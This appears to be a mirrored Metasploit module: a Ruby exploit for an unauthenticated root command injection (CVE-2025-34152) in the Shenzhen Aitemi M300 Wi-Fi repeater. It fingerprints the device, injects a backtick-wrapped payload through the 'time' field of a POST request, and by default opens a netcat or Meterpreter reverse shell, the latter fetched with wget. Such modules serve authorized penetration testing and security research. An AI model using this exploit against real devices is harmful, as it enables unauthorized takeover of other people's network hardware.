Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/aitemi_m300_time_rce.rb
33119 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'digest'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::Remote::HttpClient

12
  prepend Msf::Exploit::Remote::AutoCheck

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)',

19
        'Description' => %q{

20
          This module exploits an unauthenticated remote command injection vulnerability

21
          in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability

22
          lies in the 'time' parameter of the time configuration endpoint, which is passed

23
          unsanitized to a shell command executed via the `date -s` mechanism. The injection

24
          executes with root privileges, without requiring authentication, reboot, or

25
          network reconfiguration.

26
        },

27
        'Author' => [

28
          'Valentin Lobstein' # Vulnerability discovery and Metasploit module

29
        ],

30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          ['URL', 'https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/'],

33
          ['CVE', '2025-34152']

34
        ],

35
        'Platform' => %w[linux unix],

36
        'Payload' => {

37
          'BadChars' => "\x60"

38
        },

39
        'Targets' => [

40
          [

41
            'Unix Command',

42
            {

43
              'Platform' => 'unix',

44
              'Arch' => ARCH_CMD,

45
              'DefaultOptions' => {

46
                'PAYLOAD' => 'cmd/unix/reverse_netcat'

47
              }

48
            }

49
          ],

50
          [

51
            'Linux Meterpreter MIPSBE (MAY crash HTTP worker)',

52
            {

53
              'Platform' => 'linux',

54
              'Arch' => [ARCH_CMD, ARCH_MIPSBE],

55
              'DefaultOptions' => {

56
                'FETCH_DELETE' => true,

57
                'FETCH_COMMAND' => 'WGET',

58
                'FETCH_WRITABLE_DIR' => '/tmp',

59
                'PAYLOAD' => 'cmd/linux/http/mipsbe/meterpreter/reverse_tcp'

60
              }

61
            }

62
          ]

63
        ],

64
        'DefaultTarget' => 0,

65
        'Privileged' => true,

66
        'DisclosureDate' => '2025-08-07',

67
        'Notes' => {

68
          'Stability' => [CRASH_SERVICE_DOWN],

69
          'Reliability' => [REPEATABLE_SESSION],

70
          'SideEffects' => [IOC_IN_LOGS]

71
        }

72
      )

73
    )

74
  end

75


76
  def check

77
    fingerprint_hits = []

78


79
    res = send_request_cgi(

80
      'method' => 'GET',

81
      'uri' => normalize_uri(target_uri.path, 'favicon.ico')

82
    )

83


84
    return CheckCode::Unknown('No response from target') unless res

85
    return CheckCode::Safe('favicon.ico not found') unless res.code == 200

86


87
    hash = Digest::SHA256.hexdigest(res.body)

88
    if hash == 'eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee'

89
      print_good('Favicon hash matched – likely Aitemi M300 device')

90
      fingerprint_hits << 'favicon'

91
    end

92


93
    server_header = res.headers['Server']

94
    if server_header&.start_with?('lighttpd/1.4.32')

95
      print_good("HTTP server version matched: #{server_header}")

96
      fingerprint_hits << 'httpd'

97
    end

98


99
    %w[index.html home.html].each do |page|

100
      res_html = send_request_cgi(

101
        'method' => 'GET',

102
        'uri' => normalize_uri(target_uri.path, page)

103
      )

104


105
      next unless res_html&.code == 200

106


107
      if res_html.body.include?('langen.js') && res_html.body.include?('dw(TT_SetWifiExt)')

108
        print_good("HTML fingerprint matched in #{page} – UI strings detected")

109
        return CheckCode::Appears('HTML language markers confirmed')

110
      end

111
    end

112


113
    if fingerprint_hits.any?

114
      return CheckCode::Detected("Partial match: #{fingerprint_hits.join(', ')}")

115
    end

116


117
    CheckCode::Unknown('No identifiable fingerprint found')

118
  end

119


120
  def exploit

121
    raw_payload = "`#{payload.encoded}`"

122
    encoded_payload = CGI.escape(raw_payload).gsub('+', '%20')

123


124
    send_request_cgi(

125
      'method' => 'POST',

126
      'uri' => normalize_uri(target_uri.path, 'protocol.csp?'),

127
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',

128
      'data' => "fname=system&opt=time_conf&function=set&time=#{encoded_payload}"

129
    )

130
  end

131
end

132


133